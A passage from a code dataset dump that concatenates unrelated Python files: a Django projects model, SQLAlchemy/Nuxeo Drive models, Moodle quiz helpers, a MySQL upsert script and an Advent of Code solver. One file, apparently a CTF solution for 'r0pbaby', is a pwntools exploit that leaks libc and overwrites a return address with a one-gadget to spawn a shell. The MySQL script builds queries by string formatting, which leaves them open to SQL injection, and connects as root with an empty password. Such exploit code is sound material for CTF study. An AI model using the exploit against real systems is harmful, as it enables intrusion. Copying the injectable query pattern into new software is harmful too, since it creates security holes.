telegram_send.send(messages=['Enrolled successfully :D', \"------------\", success])\nprint(\"Script finished successfully\")\n","sub_path":"asvz_bot.py","file_name":"asvz_bot.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379056751","text":"import mysql.connector\nimport datetime\n\nclass InsertDB:\n \n mydb_name = \"arizona_zillow_db\"\n\n def insert_document(self, documents, table_name):\n print(documents)\n\n # ************** DIGITAL SERVER ***************#\n mydb = mysql.connector.connect(\n user = \"root\",\n password = \"\",\n host = \"192.168.1.118\"\n )\n\n mycursor = mydb.cursor()\n\n mycursor.execute(\"CREATE DATABASE IF NOT EXISTS \" + self.mydb_name + \" CHARACTER SET utf8 COLLATE utf8_general_ci\")\n\n # ********** DIGITAL OCEAN SERVER ***********#\n mydb = mysql.connector.connect(\n user = \"root\",\n password = \"\",\n host = \"192.168.1.118\",\n database = self.mydb_name\n )\n\n documents = documents[0]\n print(documents)\n\n mycursor = mydb.cursor()\n\n stmt = \"SHOW TABLES LIKE '{}'\".format(table_name)\n mycursor.execute(stmt)\n result = mycursor.fetchone()\n\n if not result:\n sql = \"CREATE TABLE {} (id INT(11) UNSIGNED AUTO_INCREMENT PRIMARY KEY, PropertyAddress VARCHAR(50), Street VARCHAR(30), City VARCHAR(20), State VARCHAR(20), ZipCode VARCHAR(10), StatusText VARCHAR(50), PhoneNumber VARCHAR(15), Identifier VARCHAR(100), CreatedTime VARCHAR(30), UpdatedTime VARCHAR(30), INDEX (Identifier))\".format(table_name)\n\n mycursor.execute(sql)\n mydb.commit()\n\n\n sql = \"SELECT Identifier FROM {0} WHERE Identifier='{1}'\".format(table_name, documents[7])\n mycursor.execute(sql)\n identifier_result = mycursor.fetchone()\n\n if not identifier_result:\n insert_sql = \"\"\"INSERT INTO {} (PropertyAddress, Street, City, State, ZipCode, StatusText, PhoneNumber, Identifier, CreatedTime, UpdatedTime) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\"\".format(table_name)\n\n mycursor.execute(insert_sql, documents)\n mydb.commit()\n\n else:\n update_sql = 'UPDATE {0} SET PropertyAddress=\"{1}\", Street=\"{2}\", City=\"{3}\", State=\"{4}\", ZipCode=\"{5}\", StatusText=\"{6}\", PhoneNumber=\"{7}\", UpdatedTime=\"{8}\" WHERE Identifier=\"{9}\"'.format(table_name, documents[0], documents[1], documents[2], documents[3], documents[4], documents[5], documents[6], datetime.datetime.now(), documents[7])\n print(update_sql)\n mycursor.execute(update_sql)\n \n mydb.commit()\n print(\"==================> Now time:\", datetime.datetime.now())","sub_path":"Maricopa_County/fitlering Script/insertdatabase.py","file_name":"insertdatabase.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"223737274","text":"from collections import defaultdict\n\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.sites.models import Site\nfrom django.core.mail import EmailMessage\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom django.template.loader import render_to_string\nfrom django.utils.safestring import mark_safe\nfrom django_fsm import FSMField\nfrom django_fsm import transition\nfrom menus.menu_pool import menu_pool\n\nfrom casereport.middleware import CurrentUserMiddleware\nfrom rlp.accounts.models import Institution, User\nfrom rlp.core.email import send_transactional_mail\nfrom rlp.core.mixins import SharesContentMixin\nfrom rlp.core.models import SEOMixin\n\nfrom actstream.models import Action\n\nfrom logging import getLogger\nlogger = getLogger('django')\n\nMEMBER_STATES = (\n ('moderator', 'Moderator'),\n ('member', 'Member'),\n ('pending', 'Applicant'),\n ('ignored', 'Ignored Applicant')\n)\n\n\nclass Topic(SEOMixin):\n order = models.PositiveIntegerField(default=0, db_index=True)\n\n class Meta:\n ordering = ['order']\n\n\nclass Project(SEOMixin, SharesContentMixin):\n cover_photo = models.ImageField(null=True, blank=True)\n institution = models.ForeignKey(Institution, blank=True, null=True)\n topic = models.ForeignKey(Topic, blank=True, null=True)\n approval_required = models.BooleanField(default=True,\n help_text='If checked, registrants must be approved before joining.')\n auto_opt_in = models.BooleanField('Automatically opt-in members', default=False,\n help_text='If checked, all members will be automatically added to this project.')\n users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n through=\"ProjectMembership\",\n through_fields=['project','user'],\n related_name='projects')\n goal = models.CharField(max_length=450, blank=True)\n order = models.PositiveIntegerField(default=0, db_index=True)\n created = models.DateTimeField(auto_now_add=True)\n\n @property\n def display_type(self):\n return mark_safe('{repr}'.format(url=self.get_absolute_url(), repr=self.title))\n\n class Meta:\n ordering = ['order', 'title']\n\n def __str__(self):\n return self.title\n\n def get_absolute_url(self):\n from django.core.urlresolvers import reverse\n return reverse('projects:projects_detail', kwargs={'pk': self.pk, 'slug': self.slug})\n\n def get_activity_stream(self, user=None, type_class=None):\n my_ct = ContentType.objects.get_for_model(self)\n activity_stream_queryset = Action.objects.filter(target_content_type=my_ct,\n target_object_id=self.id)\n\n # TODO: consolidate this\n if user and not user.is_staff:\n from casereport.models import CaseReport\n casereport_ct = ContentType.objects.get_for_model(CaseReport)\n my_ct = ContentType.objects.get_for_model(self)\n # not loving this, but cant use expressions like\n # action_object__workflow_state = 'live'\n # because django orm has no dynamic reverse relation\n casereport_ids = activity_stream_queryset.filter(\n public=True,\n action_object_content_type=casereport_ct,\n verb__exact = 'shared',\n target_content_type_id=my_ct,\n target_object_id=self.id).values_list('action_object_object_id', flat=True)\n logger.debug(\"shared crs %s\", list(casereport_ids))\n non_live_ids = CaseReport.objects.filter(\n id__in=list(casereport_ids)).exclude(\n workflow_state='live').values_list('id', flat=True)\n logger.debug(\"non live crs %s\", list(non_live_ids))\n activity_stream_queryset = activity_stream_queryset.exclude(\n action_object_content_type=casereport_ct,\n action_object_object_id__in=list(\n non_live_ids)) # would love to know why list was need here, but not in the query above.\n return activity_stream_queryset\n\n def get_documents_url(self):\n from django.core.urlresolvers import reverse\n return reverse(\n 'projects:projects_tab',\n kwargs={'pk': self.pk, 'slug': self.slug, 'tab': 'documents'},\n )\n\n def get_discussions_url(self):\n from django.core.urlresolvers import reverse\n return reverse(\n 'projects:projects_tab',\n kwargs={'pk': self.pk, 'slug': self.slug, 'tab': 'discussions'},\n )\n\n def get_bibliography_url(self):\n from django.core.urlresolvers import reverse\n return reverse(\n 'projects:projects_tab',\n kwargs={'pk': self.pk, 'slug': self.slug, 'tab': 'bibliography'},\n )\n\n def get_contact_email_addresses(self):\n emails = [\n pm.user.email for pm in\n ProjectMembership.objects.filter(state='moderator', project=self)\n ]\n emails += settings.REGISTRATION_REVIEWERS\n # One-off customization so that a single person could additionally be notified of 'approval required'\n # registrations, but only for projects that specifically require approval. We do NOT send to these recipients\n # if approval is required only because the user's email address didn't match their institution's domain.\n if self.approval_required:\n emails.extend(settings.REGISTRATION_REVIEWERS_FOR_APPROVAL_REQUIRED_PROJECTS)\n return emails\n\n def notify_members(self, subject, context, template='emails/notification'):\n # dead code?\n for membership in self.projectmembership_set.filter(user__is_active=True):\n send_transactional_mail(\n membership.user.email,\n subject,\n template,\n context\n )\n\n def save(self, *args, **kwargs):\n # Groups are in the top level navigation and need to clear the cache\n # on save.\n menu_pool.clear()\n super().save(*args, **kwargs)\n\n def active_members(self):\n return self.users.exclude(projectmembership__state__in=('pending',\n 'ignored',))\n\n def pending_members(self):\n return self.users.filter(projectmembership__state='pending')\n\n def moderators(self):\n return self.users.filter(projectmembership__state='moderator')\n\n def project_mods(self):\n mods = self.users.filter(projectmembership__state='moderator')\n return ' | '.join([x.get_full_name() for x in mods])\n\n def add_member(self, user, state=None, approver=None):\n \"\"\" add user to the project(group)\n if the user was already a member, no action is taken\n if the project requires membership approval, the user will be pending.\n otherwise a normal membership is made.\n\n Returns the ProjectMemebership ( pending, member, moderator )\n \"\"\"\n\n membership, is_new = ProjectMembership.objects.get_or_create(\n project=self,\n user=user,\n )\n\n if state:\n membership.state = state\n\n # if moderator approval isn't needed, approve the member now\n elif not self.approval_required:\n membership.state = 'member'\n\n if approver:\n membership.approver = approver\n\n membership.save()\n return membership\n\n def remove_member(self, user):\n \"\"\" remove user from the project.\n \"\"\"\n membership = self.projectmembership_set.get_or_create(user=user)\n membership.delete()\n\n\nfrom rlp.accounts.models import EMAIL_PREF_CHOICES as ALL_EMAIL_PREFS_CHOICES, DIGEST_PREF_CHOICES\nEMAIL_PREFS_CHOICES = [choice for choice in ALL_EMAIL_PREFS_CHOICES if choice[0] != 'user_only']\n\n\nclass ProjectMembership(models.Model):\n project = models.ForeignKey(Project)\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='projectmembership')\n state = FSMField(choices=MEMBER_STATES, default='pending')\n approver = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='approvals',\n null=True, blank=True)\n email_prefs = models.CharField(\n max_length=255,\n verbose_name='Email notification preferences for Groups',\n choices=EMAIL_PREFS_CHOICES,\n null=True,\n blank=True,\n )\n digest_prefs = models.CharField(\n max_length=255,\n verbose_name='Email digest preferences',\n choices=DIGEST_PREF_CHOICES,\n null=True,\n blank=True,\n )\n\n class Meta:\n unique_together = ['project', 'user']\n ordering = ['project']\n\n def __str__(self):\n return \"{user} is {state} of {project}\".format(user=self.user.email, state=self.state,\n project=self.project.title)\n\n @property\n def display_type(self):\n return \"{user}'s request to join {group}\".format(user=self.user, group=self.project)\n\n @transition(field=state, source='*', target='moderator')\n def promote(self):\n pass\n\n @transition(field=state, source='moderator', target='member')\n def demote(self):\n pass\n\n @transition(field=state, source='pending', target='member')\n def approve(self):\n # TODO: alert the user\n # activity stream entries for the user, the group and moderator\n # only log the approval if it wasn't automatic because the group was\n # open\n approver = CurrentUserMiddleware.get_user()\n self.approver = approver\n\n approval_action = Action(\n actor= self.user,\n verb='joined',\n action_object=self,\n target=self.project,\n )\n approval_action.save()\n\n @transition(field=state, source='pending', target='ignored')\n def ignore(self):\n approver = CurrentUserMiddleware.get_user()\n self.approver = approver\n\n # this is to inform the user\n request_declined = Action(actor=self.user,\n verb='declined',\n action_object=self,\n target=None)\n request_declined.save()\n","sub_path":"rlp/projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600076740","text":"from pwn import *\r\n\r\ndef get_libc():\r\n\tr.sendlineafter(\": \", '2')\r\n\tr.sendlineafter(\"symbol: \", \"system\")\r\n\tr.recvuntil(\"system: \")\r\n\treturn int(r.recv(18), 16) - l.functions[\"system\"].address\r\n\r\ndef fill_buffer(size, data):\r\n\tr.sendlineafter(\": \", '3')\r\n\tr.sendlineafter(\"(max 1024): \", str(size))\r\n\tr.sendline(data)\r\n\r\ndef exit():\r\n\tr.sendlineafter(\": \", '4')\r\n\tr.recv(1024)\r\n\r\nr = process(\"./r0pbaby\")\r\nl = r.libc\r\n\r\nlibc_base = get_libc()\r\noneshot = libc_base + 0xf0567\r\nlog.info(\"libc_base : \" + hex(libc_base))\r\n\r\npayload = 'A' * 8\r\npayload += p64(oneshot)\r\nfill_buffer(len(payload) + 1, payload)\r\nexit()\r\n\r\nr.interactive()","sub_path":"r0pbaby/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462627804","text":"from xml.dom.minidom import parse\nimport os\nimport re\nimport shutil\nfrom string import Template\nfrom lxml import etree\nfrom bs4 import BeautifulSoup as BS\nfrom bs4 import Comment\n\ndef prompt_from_html(html_filename, id):\n \"\"\"\n Search for a question or task prompt from the html file by ID\n \"\"\"\n with open(html_filename, encoding='utf-8') as fp:\n soup = BS(fp, 'html.parser')\n comments = soup.find_all(string=lambda text: isinstance(text, Comment))\n for c in comments:\n if c.split(' ')[2] == id:\n next_node = c.find_next_sibling('div')\n prompt = ''.join([str(i) for i in next_node.p.contents])\n return prompt\n\ndef natural_sort_key(s):\n \"\"\"\n Return a key for sorting a list containing subtasks in format [\"1a\", \"3d\", \"5c\", ...]\n \"\"\"\n return [int(text) if text.isdigit() else text.lower()\n for text in re.split(re.compile('([0-9]+)'), s)]\n\ndef getdict_userid_username():\n \"\"\"\n Make a dictionary to map from Moodle user IDs to user names\n \"\"\"\n dict_userid_username = {}\n userxml = os.path.join(\"backup\",\"users.xml\")\n docs = parse(userxml)\n users = docs.getElementsByTagName(\"user\")\n for user in users:\n userid = int(user.getAttribute(\"id\"))\n username = user.getElementsByTagName(\"username\")[0].firstChild.nodeValue\n dict_userid_username[userid] = username\n return dict_userid_username\n \ndef getdicts_question_task(prompt_source='xml', html_filename=None):\n \"\"\"\n Return:\n dict_q: dictionary from question number in quiz.txt (1,2,3,4,5...) to question number in moodle (1a,1b,2a,2b,2c...)\n dict_task_prompt: dictionary from task number in moodle (1,2,3,4...) to corresponding task prompt\n dict_question_prompt: dictionary from question number in moodle (1a,3c,6f...) to corresponding prompt\n \"\"\"\n dict_q = {}\n dict_task_prompt = {}\n dict_question_prompt = {}\n\n question_list = []\n qxml = os.path.join(\"backup\",\"questions.xml\")\n docs = parse(qxml)\n tasks = docs.getElementsByTagName(\"question_category\")\n for task in tasks:\n name = task.getElementsByTagName(\"name\")[0].firstChild.nodeValue\n if name.split(' ')[0] == \"Tehtävä\":\n tasknum = int(name.split(' ')[1])\n questions = task.getElementsByTagName(\"question\")\n for q in questions:\n id = q.getAttribute('id')\n if prompt_source == 'xml':\n prompt = q.getElementsByTagName(\"questiontext\")[0].firstChild.nodeValue # task_prompt.txt / prompt.txt\n elif prompt_source == 'html':\n prompt = prompt_from_html(html_filename, id)\n q_name = q.getElementsByTagName(\"name\")[0].firstChild.nodeValue\n if q_name.split(' ')[1].isdigit(): # Tehtävä X (1,2...)\n\n # In pilot test, tasks 3 and 8 do not have sub-tasks!!\n if tasknum == 3:\n dict_task_prompt[tasknum] = prompt\n dict_question_prompt[str(tasknum)+'a'] = '' # no need to duplicate the prompt\n question_list.append(str(tasknum)+'a')\n elif tasknum == 8:\n if q.getAttribute(\"id\") == \"3013\": # Tehtävä 8\n dict_task_prompt[tasknum] = prompt\n elif q.getAttribute(\"id\") == \"3014\": # Tehtävä 8a\n dict_question_prompt[str(tasknum)+'a'] = prompt\n question_list.append(str(tasknum)+'a')\n\n else:\n dict_task_prompt[tasknum] = prompt\n\n else: # Tehtävä Xx (1a,2f...)\n task_question = q_name.split(' ')[1]\n dict_question_prompt[task_question] = prompt\n question_list.append(task_question)\n question_list.sort(key=natural_sort_key)\n for i in range(len(question_list)):\n dict_q[i+1] = question_list[i]\n return dict_q, dict_task_prompt, dict_question_prompt\n\ndef make_dirs(dict_task_prompt, dict_question_prompt):\n \"\"\"\n Create folders for tasks and subtasks and adds prompts\n \"\"\"\n parent_dir = \"moodle_quiz\"\n if not os.path.isdir(parent_dir):\n os.mkdir(parent_dir)\n for tasknum in dict_task_prompt.keys():\n if not os.path.isdir(os.path.join(parent_dir,str(tasknum))):\n os.mkdir(os.path.join(parent_dir,str(tasknum)))\n with open(os.path.join(parent_dir,str(tasknum),'task_prompt.txt'), 'w', encoding='utf-8') as f:\n f.write(dict_task_prompt[tasknum])\n for qnum in dict_question_prompt.keys():\n if tasknum == int(qnum[:-1]):\n if not os.path.isdir(os.path.join(parent_dir,str(tasknum),qnum)):\n os.mkdir(os.path.join(parent_dir,str(tasknum),qnum))\n with open(os.path.join(parent_dir,str(tasknum),qnum,'prompt.txt'), 'w', encoding='utf-8') as f:\n f.write(dict_question_prompt[qnum])\n\ndef get_prompt_files():\n \"\"\"\n Extract auxilary prompt files (images & audio) to a separate folder\n \"\"\"\n hash2filename_dict = {}\n fxml = os.path.join(\"backup\",\"files.xml\")\n docs = parse(fxml)\n files = docs.getElementsByTagName(\"file\")\n\n # Find all files and corresponding real filenames\n for f in files:\n filetype = f.getElementsByTagName(\"mimetype\")[0].firstChild.nodeValue.split('/')[0]\n if filetype == 'audio' or filetype == 'image':\n filename = f.getElementsByTagName(\"filename\")[0].firstChild.nodeValue\n content_hash = f.getElementsByTagName(\"contenthash\")[0].firstChild.nodeValue\n hash2filename_dict[content_hash] = filename\n\n # Search for files, copy to propmt_files dir and rename\n filedir = os.path.join(\"backup\",\"files\")\n promptdir = \"prompt_files\"\n if not os.path.isdir(promptdir):\n os.mkdir(\"prompt_files\")\n for root, _, files in os.walk(filedir):\n for name in files:\n if name in hash2filename_dict:\n shutil.copy(os.path.join(root, name), os.path.join(promptdir, hash2filename_dict[name]))\n\ndef read_txt(filename):\n with open(filename, 'r', encoding='utf8') as file:\n txt = file.read()\n return str(txt)\n\ndef gen_rubric(txt, student, question, t_prompt, q_prompt, wavpath):\n s = Template(txt)\n tt = s.substitute(StudentID=student, QuestionID=question, TaskPrompt=t_prompt, QuestionPrompt=q_prompt, Wav_path=wavpath)\n return tt\n \n\ndef generate_quiz_xml(txt, task, ques_var, user, wav_path, task_prompt, question_prompt, quiz):\n \"\"\"Generate a Cloze-type Moodle question quiz\"\"\"\n \n question = etree.SubElement(quiz, \"question\", type=\"cloze\")\n name = etree.SubElement(question, \"name\")\n text = etree.SubElement(name, \"text\")\n text.text = f\"{task}_{ques_var}_{user}\"\n questiontext = etree.SubElement(question, \"questiontext\", format=\"html\")\n qtext = etree.SubElement(questiontext, \"text\")\n qtext.text = gen_rubric(txt, user, ques_var, read_txt(task_prompt), read_txt(question_prompt), wav_path)\n generalfeedback = etree.SubElement(question, \"generalfeedback\", format=\"html\")\n gb_text = etree.SubElement(generalfeedback, \"text\")\n penalty = etree.SubElement(question, \"penalty\")\n penalty.text = \"0.333\"\n hidden = etree.SubElement(question, \"hidden\")\n hidden.text = \"0\"\n idnumber = etree.SubElement(question, \"idnumber\")\n return quiz","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423312060","text":"from sqlalchemy import Column, Integer, String, ForeignKey\nfrom sqlalchemy.orm import relationship\n\nfrom app.main.model.tree_new_db.init_base import Base\n\n\nclass Staff(Base):\n __tablename__ = 'retail_staff'\n id = Column(Integer, primary_key=True)\n name = Column(String(50), nullable=False)\n\n\nclass Shop(Base):\n __tablename__ = 'retail_shop'\n id = Column(Integer, primary_key=True)\n name = Column(String(50), nullable=False)\n address = Column(String(100))\n manager_staff_id = Column(Integer, ForeignKey(Staff.id))\n staff_id = Column(Integer, ForeignKey(Staff.id))\n staff = relationship(Staff, backref='shop')\n\n\n","sub_path":"app/main/company/model/Retail.py","file_name":"Retail.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"155212470","text":"import os\nimport logging\nimport datetime\nfrom sqlalchemy import Column\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import Sequence\nfrom sqlalchemy import String\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import backref\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\n\nfrom nxdrive.client import NuxeoClient\nfrom nxdrive.client import LocalClient\n\ntry:\n from exceptions import WindowsError\nexcept ImportError:\n WindowsError = None # this will never be raised under unix\n\n\nlog = logging.getLogger(__name__)\n\n\n# make the declarative base class for the ORM mapping\nBase = declarative_base()\n\n\n__model_version__ = 1\n\n# Summary status from last known pair of states\n\nPAIR_STATES = {\n # regular cases\n ('unknown', 'unknown'): 'unknown',\n ('synchronized', 'synchronized'): 'synchronized',\n ('created', 'unknown'): 'locally_created',\n ('unknown', 'created'): 'remotely_created',\n ('modified', 'synchronized'): 'locally_modified',\n ('synchronized', 'modified'): 'remotely_modified',\n ('modified', 'unknown'): 'locally_modified',\n ('unknown', 'modified'): 'remotely_modified',\n ('deleted', 'synchronized'): 'locally_deleted',\n ('synchronized', 'deleted'): 'remotely_deleted',\n ('deleted', 'deleted'): 'deleted',\n\n # conflicts with automatic resolution\n ('created', 'deleted'): 'locally_created',\n ('deleted', 'created'): 'remotely_created',\n ('modified', 'deleted'): 'locally_created',\n ('deleted', 'modified'): 'remotely_created',\n\n # conflict cases that need special\n ('modified', 'modified'): 'conflicted',\n ('created', 'created'): 'conflicted',\n}\n\n\nclass ServerBinding(Base):\n __tablename__ = 'server_bindings'\n\n local_folder = Column(String, primary_key=True)\n server_url = Column(String)\n remote_user = Column(String)\n remote_password = Column(String)\n\n def __init__(self, local_folder, server_url, remote_user,\n remote_password):\n self.local_folder = local_folder\n self.server_url = server_url\n self.remote_user = remote_user\n self.remote_password = remote_password\n\n\nclass RootBinding(Base):\n __tablename__ = 'root_bindings'\n\n local_root = Column(String, primary_key=True)\n remote_repo = Column(String)\n remote_root = Column(String)\n local_folder = Column(String, ForeignKey('server_bindings.local_folder'))\n\n server_binding = relationship(\n 'ServerBinding',\n backref=backref(\"roots\", cascade=\"all, delete-orphan\"))\n\n def __init__(self, local_root, remote_repo, remote_root):\n local_root = os.path.abspath(local_root)\n self.local_root = local_root\n self.remote_repo = remote_repo\n self.remote_root = remote_root\n\n # expected local folder should be the direct parent of the\n local_folder = os.path.abspath(os.path.join(local_root, '..'))\n self.local_folder = local_folder\n\n def __repr__(self):\n return (\"RootBinding\" % (self.local_root, self.local_folder,\n self.remote_repo, self.remote_root))\n\n\nclass LastKnownState(Base):\n \"\"\"Aggregate state aggregated from last collected events.\"\"\"\n __tablename__ = 'last_known_states'\n\n id = Column(Integer, Sequence('state_id_seq'), primary_key=True)\n local_root = Column(String, ForeignKey('root_bindings.local_root'),\n index=True)\n root_binding = relationship(\n 'RootBinding',\n backref=backref(\"states\", cascade=\"all, delete-orphan\"))\n\n # Timestamps to detect modifications\n last_local_updated = Column(DateTime)\n last_remote_updated = Column(DateTime)\n\n # Save the digest too for better updates / moves detection\n local_digest = Column(String, index=True)\n remote_digest = Column(String, index=True)\n\n # Path from root using unix separator, '/' for the root it-self.\n path = Column(String, index=True)\n remote_path = Column(String) # for ordering only\n\n # Remote reference (instead of path based lookup)\n remote_ref = Column(String, index=True)\n\n # Parent path from root / ref for fast children queries,\n # can be None for the root it-self.\n parent_path = Column(String, index=True)\n remote_parent_ref = Column(String, index=True)\n\n # Names for fast alignment queries\n local_name = Column(String, index=True)\n remote_name = Column(String, index=True)\n\n folderish = Column(Integer)\n\n # Last known state based on event log\n local_state = Column(String)\n remote_state = Column(String)\n pair_state = Column(String, index=True)\n\n # Track move operations to avoid loosing history\n locally_moved_from = Column(String)\n locally_moved_to = Column(String)\n remotely_moved_from = Column(String)\n remotely_moved_to = Column(String)\n\n def __init__(self, local_root, local_info=None, remote_info=None,\n local_state='unknown', remote_state='unknown'):\n self.local_root = local_root\n if local_info is None and remote_info is None:\n raise ValueError(\n \"At least local_info or remote_info should be provided\")\n\n if local_info is not None:\n self.update_local(local_info)\n if remote_info is not None:\n self.update_remote(remote_info)\n\n self.update_state(local_state=local_state, remote_state=remote_state)\n\n def update_state(self, local_state=None, remote_state=None):\n if local_state is not None:\n self.local_state = local_state\n if remote_state is not None:\n self.remote_state = remote_state\n pair = (self.local_state, self.remote_state)\n self.pair_state = PAIR_STATES.get(pair, 'unknown')\n\n def __repr__(self):\n return (\"LastKnownState\") % (\n os.path.basename(self.local_root),\n self.path, self.remote_name,\n self.local_state, self.remote_state)\n\n def get_local_client(self):\n return LocalClient(self.local_root)\n\n def get_remote_client(self, factory=None):\n if factory is None:\n factory = NuxeoClient\n rb = self.root_binding\n sb = rb.server_binding\n return factory(\n sb.server_url, sb.remote_user, sb.remote_password,\n base_folder=rb.remote_root, repository=rb.remote_repo)\n\n def refresh_local(self, client=None):\n \"\"\"Update the state from the local filesystem info.\"\"\"\n client = client if client is not None else self.get_local_client()\n local_info = client.get_info(self.path, raise_if_missing=False)\n self.update_local(local_info)\n return local_info\n\n def update_local(self, local_info):\n \"\"\"Update the state from pre-fetched local filesystem info.\"\"\"\n if local_info is None:\n if self.local_state in ('unknown', 'created', 'modified',\n 'synchronized'):\n # the file use to exist, it has been deleted\n self.update_state(local_state='deleted')\n self.local_digest = None\n return\n\n if self.path is None:\n self.path = local_info.path\n if self.path != '/':\n self.local_name = os.path.basename(local_info.path)\n parent_path, _ = local_info.path.rsplit('/', 1)\n self.parent_path = '/' if parent_path == '' else parent_path\n else:\n self.local_name = os.path.basename(self.local_root)\n self.parent_path = None\n\n if self.path != local_info.path:\n raise ValueError(\"State %r cannot be mapped to '%s%s'\" % (\n self, self.local_root, local_info.path))\n\n # Shall we recompute the digest from the current file?\n update_digest = self.local_digest == None\n\n if self.last_local_updated is None:\n self.last_local_updated = local_info.last_modification_time\n self.folderish = local_info.folderish\n update_digest = True\n\n elif local_info.last_modification_time > self.last_local_updated:\n self.last_local_updated = local_info.last_modification_time\n self.folderish = local_info.folderish\n if not self.folderish:\n # The time stamp of folderish folder seems to be updated when\n # children are added under Linux? Is this the same under OSX\n # and Windows?\n self.update_state(local_state='modified')\n update_digest = True\n\n if update_digest:\n try:\n self.local_digest = local_info.get_digest()\n except (IOError, WindowsError):\n # This can fail when another process is writing the same file\n # let's postpone digest computation in that case\n log.debug(\"Delaying local digest computation for %r\"\n \" due to possible concurrent file access.\",\n local_info.filepath)\n\n # XXX: shall we store local_folderish and remote_folderish to\n # detect such kind of conflicts instead?\n\n # else: nothing to do\n\n def refresh_remote(self, client=None):\n \"\"\"Update the state from the remote server info.\n\n Can reuse an existing client to spare some redundant client init HTTP\n request.\n \"\"\"\n client = client if client is not None else self.get_remote_client()\n fetch_parent_uid = self.path != '/'\n remote_info = client.get_info(self.remote_ref, raise_if_missing=False,\n fetch_parent_uid=fetch_parent_uid)\n self.update_remote(remote_info)\n return remote_info\n\n def update_remote(self, remote_info):\n \"\"\"Update the state from the pre-fetched remote server info.\"\"\"\n if remote_info is None:\n if self.remote_state in ('unknown', 'created', 'modified',\n 'synchronized'):\n self.update_state(remote_state='deleted')\n self.remote_digest = None\n return\n\n if self.remote_ref is None:\n self.remote_ref = remote_info.uid\n self.remote_parent_ref = remote_info.parent_uid\n self.remote_name = remote_info.name\n self.remote_path = remote_info.path\n\n if self.remote_ref != remote_info.uid:\n raise ValueError(\"State %r cannot be mapped to remote doc %r\" % (\n self, remote_info.name))\n\n if self.last_remote_updated is None:\n self.last_remote_updated = remote_info.last_modification_time\n self.remote_digest = remote_info.get_digest()\n self.folderish = remote_info.folderish\n self.remote_name = remote_info.name\n self.remote_path = remote_info.path\n\n elif remote_info.last_modification_time > self.last_remote_updated:\n self.last_remote_updated = remote_info.last_modification_time\n self.update_state(remote_state='modified')\n self.remote_digest = remote_info.get_digest()\n self.folderish = remote_info.folderish\n self.remote_name = remote_info.name\n self.remote_path = remote_info.path\n\n # else: nothing to update\n\n def get_local_abspath(self):\n relative_path = self.path[1:].replace('/', os.path.sep)\n return os.path.join(self.local_root, relative_path)\n\n\nclass FileEvent(Base):\n __tablename__ = 'fileevents'\n\n id = Column(Integer, Sequence('fileevent_id_seq'), primary_key=True)\n local_root = Column(String, ForeignKey('root_bindings.local_root'))\n utc_time = Column(DateTime)\n path = Column(String)\n\n root_binding = relationship(\"RootBinding\")\n\n def __init__(self, local_root, path, utc_time=None):\n self.local_root = local_root\n if utc_time is None:\n utc_time = datetime.utcnow()\n\n\ndef get_session_maker(nxdrive_home, echo=False):\n \"\"\"Return a session maker configured for using nxdrive_home\n\n The database is created in nxdrive_home if missing and the tables\n are intialized based on the model classes from this module (they\n all inherit the same abstract base class.\n \"\"\"\n # We store the DB as SQLite files in the nxdrive_home folder\n dbfile = os.path.join(os.path.abspath(nxdrive_home), 'nxdrive.db')\n engine = create_engine('sqlite:///' + dbfile, echo=echo)\n\n # Ensure that the tables are properly initialized\n Base.metadata.create_all(engine)\n return sessionmaker(bind=engine)\n\n\ndef get_scoped_session_maker(nxdrive_home, echo=False):\n \"\"\"Return a session maker configured for using nxdrive_home\n\n The database is created in nxdrive_home if missing and the tables\n are intialized based on the model classes from this module (they\n all inherit the same abstract base class.\n\n Sessions built with this maker are reusable thread local\n singletons.\n \"\"\"\n return scoped_session(get_session_maker(nxdrive_home, echo=echo))\n","sub_path":"nuxeo-drive-client/nxdrive/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433822256","text":"#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom itertools import product\n\n# %%\ndef parser(filename):\n with open(filename) as f:\n data = [[0 if s=='.' else 1 for s in line] for line in f.read().splitlines()]\n return data\n\n# %%\ndef apply_conway_n_times(A, n):\n dim = A.ndim # dimension\n Z = np.pad(A, (1 + n)) # add enough border\n N = np.zeros(Z.shape, dtype=int) # number of neighbors\n center = (np.s_[1:-1],) * dim # core of the grid (no borders)\n \n for _ in range(n):\n # Compute the number of neighbors\n N[...] = 0\n for neigh_slice in product([np.s_[:-2], np.s_[1:-1], np.s_[2:]], repeat=dim):\n if neigh_slice != center:\n N[center] += Z[neigh_slice]\n\n # Update the Conway grid\n birth = (N == 3) & (Z == 0) # inactive cell with 3 neighbors becomes active\n survive = ((N == 2) | (N == 3)) & (Z == 1) # active cell with 2 or 3 neig. stays active\n Z[...] = 0\n Z[birth | survive] = 1\n \n return Z\n\n# %%\nif __name__ == \"__main__\":\n from os.path import dirname, join, realpath\n folder = join(dirname(dirname(realpath(__file__))), \"data\")\n data = parser(f\"{folder}/day17.txt\")\n n = len(data)\n \n Z_3d = 